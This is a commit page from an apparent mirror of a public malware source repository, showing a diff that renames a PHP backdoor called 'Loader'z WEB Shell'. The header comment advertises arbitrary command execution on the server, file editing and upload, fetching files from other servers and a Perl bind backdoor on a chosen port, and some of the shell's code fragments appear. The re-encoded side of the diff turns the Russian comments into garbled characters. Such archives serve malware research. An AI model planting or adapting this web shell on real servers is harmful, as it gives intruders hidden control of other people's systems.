ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Rename Backdoor.PHP.WebShell.ae to Backdoor.PHP.Loaders.a.b

Browse Source
This commit is contained in:
vxunderground 2020-10-30 00:06:59 -05:00 committed by GitHub
parent d3a4492062
commit 88e627e30d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 18 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
PHP/Backdoor.PHP.WebShell.ae → PHP/Backdoor.PHP.Loaders.a.b
View File

@ -1,20 +1,20 @@
<? <?
error_reporting(0); error_reporting(0);
/* Loader'z WEB Shell v 0.1.0.2 {15 августа 2005} /* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
Вот какие он поддерживает функции. Âîò êàêèå îí ïîääåðæèâàåò ôóíêöèè.
- Работа с файловой системой с помощью PHP. В удобной таблице представлено содержимое текущей паки (добавление в этой версии, нормальный вид прав, а не число :)). - Ðàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüþ PHP.  óäîáíîé òàáëèöå ïðåäñòàâëåíî ñîäåðæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ýòîé âåðñèè, íîðìàëüíûé âèä ïðàâ, à íå ÷èñëî :)).
- Выполнение кода, пхп рулит ;) - Âûïîëíåíèå êîäà, ïõï ðóëèò ;)
- Работает при register_globals=off - Ðàáîòàåò ïðè register_globals=off
- Более приятная работа в сейф моде - Áîëåå ïðèÿòíàÿ ðàáîòà â ñåéô ìîäå
- Просмотр и редактирование файлов. - Ïðîñìîòð è ðåäàêòèðîâàíèå ôàéëîâ.
- Закачка файлов с другого сервера с помощью средств PHP. - Çàêà÷êà ôàéëîâ ñ äðóãîãî ñåðâåðà ñ ïîìîùüþ ñðåäñòâ PHP.
- Закачка файлов с вашего жесткого диска. - Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
- Выполнение произвольных команд на сервере. - Âûïîëíåíèå ïðîèçâîëüíûõ êîìàíä íà ñåðâåðå.
- Скрипт выдает значение некоторых переменных. Например он сообщит включен ли сейф мод, если да, то скрипт выведет директорию которая, - Ñêðèïò âûäàåò çíà÷åíèå íåêîòîðûõ ïåðåìåííûõ. Íàïðèìåð îí ñîîáùèò âêëþ÷åí ëè ñåéô ìîä, åñëè äà, òî ñêðèïò âûâåäåò äèðåêòîðèþ êîòîðàÿ,
вам доступна, а так же путь, где вы можете выполнять команды. âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
- Работа скрипта основана на определении типа сервера. - Ðàáîòà ñêðèïòà îñíîâàíà íà îïðåäåëåíèè òèïà ñåðâåðà.
- Если скрипт работает под управлением ОС Windows, данные получаемые при выполнении команд перекодируются в win-1251. - Åñëè ñêðèïò ðàáîòàåò ïîä óïðàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïðè âûïîëíåíèè êîìàíä ïåðåêîäèðóþòñÿ â win-1251.
- Присутствует простенький скрипт перл-бинд. Вы можете указать домашнюю директрию и порт на котором повесится бекдор. - Ïðèñóòñòâóåò ïðîñòåíüêèé ñêðèïò ïåðë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíþþ äèðåêòðèþ è ïîðò íà êîòîðîì ïîâåñèòñÿ áåêäîð.
Loader Pro-Hack.ru Loader Pro-Hack.ru
*/ */
?> ?>
@ -190,9 +190,9 @@ return trim($s);
/*Начинается*/ /*Íà÷èíàåòñÿ*/
/*Определяем тип системы*/ /*Îïðåäåëÿåì òèï ñèñòåìû*/
$servsoft = $_SERVER['SERVER_SOFTWARE']; $servsoft = $_SERVER['SERVER_SOFTWARE'];
if (ereg("Win32", $servsoft, $reg)){ if (ereg("Win32", $servsoft, $reg)){
@ -279,7 +279,7 @@ if($ok)
{ {
$size = filesize($_POST['fileto'])/1024; $size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size); $sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK. (".$sizef."кБ)</div></center>"; print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
} }
else else
{ {